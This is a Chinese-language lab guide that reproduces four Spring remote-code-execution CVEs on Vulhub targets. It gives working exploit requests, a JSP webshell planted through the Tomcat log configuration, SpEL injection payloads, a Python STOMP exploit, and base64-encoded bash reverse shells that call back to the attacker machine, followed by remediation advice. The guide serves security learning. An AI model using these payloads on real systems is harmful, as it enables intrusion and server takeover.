Spring框架漏洞解析之二
字数 1834 2025-08-18 11:36:53
Spring框架漏洞解析与复现指南
目录
- Spring Framework 远程代码执行漏洞(CVE-2022-22965)
- Spring Cloud Gateway 远程代码执行(CVE-2022-22947)
- Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
- Spring Messaging 远程命令执行漏洞(CVE-2018-1270)
Spring Framework 远程代码执行漏洞(CVE-2022-22965)
漏洞简介
该漏洞(CVE-2022-22965)是在Java 9环境下,引入了class.module.classLoader属性,导致可以绕过CVE-2010-1622漏洞的补丁。JDK9中存在可以绕过黑名单禁用的类,从而导致了此漏洞。
实验环境
- 攻击机: Kali Linux (192.168.200.14)
- 靶机: Ubuntu (192.168.200.47)
- 实验平台: Vulhub
漏洞复现步骤
-
环境准备
cd /vulhub/spring/CVE-2022-22965 docker-compose up -d -
访问目标环境
http://192.168.200.47:8080 -
构造Payload修改Tomcat日志配置
发送以下GET请求以更改Apache Tomcat的日志记录配置,并将日志写入为JSP文件:GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 Host: 192.168.200.147:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close suffix: %>// c1: Runtime c2: <% DNT: 1 -
访问Webshell执行命令
http://192.168.200.47:8080/tomcatwar.jsp?pwd=j&cmd=id
漏洞修复
- 升级Spring Framework到安全版本
- 限制对危险类的访问
Spring Cloud Gateway 远程代码执行(CVE-2022-22947)
漏洞简介
Spring Cloud Gateway提供了一个在Spring WebFlux之上构建API网关的库。在3.1.0和3.0.6之前的版本中,当启用或暴露不安全的Gateway Actuator端点时,应用程序容易受到代码注入攻击,远程攻击者可以通过发送恶意请求执行任意代码。
实验环境
- 攻击机: Kali Linux (192.168.200.14)
- 靶机: Ubuntu (192.168.200.47)
- 实验平台: Vulhub
漏洞复现步骤
-
环境准备
cd /vulhub/spring/CVE-2022-22947 docker-compose up -d -
构造恶意路由
发送POST请求添加包含恶意SpEL表达式的路由:POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.200.47:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 310 { "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } }], "uri": "http://example.com" } -
刷新路由触发执行
POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.200.47:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 -
查看执行结果
GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.200.47:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 -
清理环境
DELETE /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.200.47:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close
漏洞修复
- 升级Spring Cloud Gateway到3.1.0+或3.0.6+版本
- 禁用或保护Actuator端点
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
漏洞简介
Spring Data Commons是Spring Data下所有子项目共享的基础框架。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
实验环境
- 攻击机: Kali Linux (192.168.200.14)
- 靶机: Ubuntu (192.168.200.47)
- 实验平台: Vulhub
漏洞复现步骤
-
环境准备
cd /vulhub/spring/CVE-2018-1273 docker-compose up -d -
访问用户注册页面
http://192.168.200.47:8080/users -
构造恶意POST请求
POST /users?page=&size=5 HTTP/1.1 Host: 192.168.200.47:8080 Connection: keep-alive Content-Length: 124 Pragma: no-cache Cache-Control: no-cache Origin: http://localhost:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost:8080/users?page=0&size=5 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword= -
验证命令执行
docker compose exec spring bash ls /tmp/success -
反弹Shell(可选)
使用base64编码的反弹shell命令:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xNC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
漏洞修复
- 升级Spring Data Commons到2.0.6+版本
- 对用户输入进行严格过滤
Spring Messaging 远程命令执行漏洞(CVE-2018-1270)
漏洞简介
Spring框架中的spring-messaging模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,攻击者可以通过构造恶意的消息实现远程代码执行。
实验环境
- 攻击机: Kali Linux (192.168.200.14)
- 靶机: Ubuntu (192.168.200.47)
- 实验平台: Vulhub
漏洞复现步骤
-
环境准备
cd /vulhub/spring/CVE-2018-1270 docker-compose up -d -
使用Python3执行EXP脚本
以下是关键代码部分:#!/usr/bin/env python3 import requests import random import string import time import threading import logging import sys import json logging.basicConfig(stream=sys.stdout, level=logging.INFO) def random_str(length): letters = string.ascii_lowercase + string.digits return ''.join(random.choice(letters) for c in range(length)) class SockJS(threading.Thread): def __init__(self, url, *args, **kwargs): super().__init__(*args, **kwargs) self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}' self.daemon = True self.session = requests.session() self.session.headers = { 'Referer': url, 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)' } self.t = int(time.time() * 1000) def run(self): url = f'{self.base}/htmlfile?c=_jp.vulhub' response = self.session.get(url, stream=True) for line in response.iter_lines(): time.sleep(0.5) def send(self, command, headers, body=''): data = [command.upper(), '\n'] data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()])) data.append('\n\n') data.append(body) data.append('\x00') data = json.dumps([''.join(data)]) response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data) if response.status_code != 204: logging.info(f"send '{command}' data error.") else: logging.info(f"send '{command}' data success.") def __del__(self): self.session.close() sockjs = SockJS('http://192.168.200.47:8080/gs-guide-websocket') sockjs.start() time.sleep(1) sockjs.send('connect', { 'accept-version': '1.1,1.0', 'heart-beat': '10000,10000' }) sockjs.send('subscribe', { 'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xNC84ODk5IDA+JjE=}|{base64,-d}|{bash,-i}')", 'id': 'sub-0', 'destination': '/topic/greetings' }) data = json.dumps({'name': 'vulhub'}) sockjs.send('send', { 'content-length': len(data), 'destination': '/app/hello' }, data) -
监听反弹Shell
nc -lvnp 8899
漏洞修复
- 升级Spring Framework到5.0.5+版本
- 禁用不必要的STOMP端点
总结
本文详细分析了四个Spring框架中的高危漏洞,包括它们的原理、复现步骤和修复方案。这些漏洞都允许远程攻击者执行任意代码,危害极大。安全建议包括:
- 及时更新Spring框架及相关组件到最新安全版本
- 禁用不必要的功能和端点
- 对用户输入进行严格过滤和验证
- 最小化应用程序的权限
在实际生产环境中,应定期进行安全评估和漏洞扫描,确保系统不受已知漏洞的影响。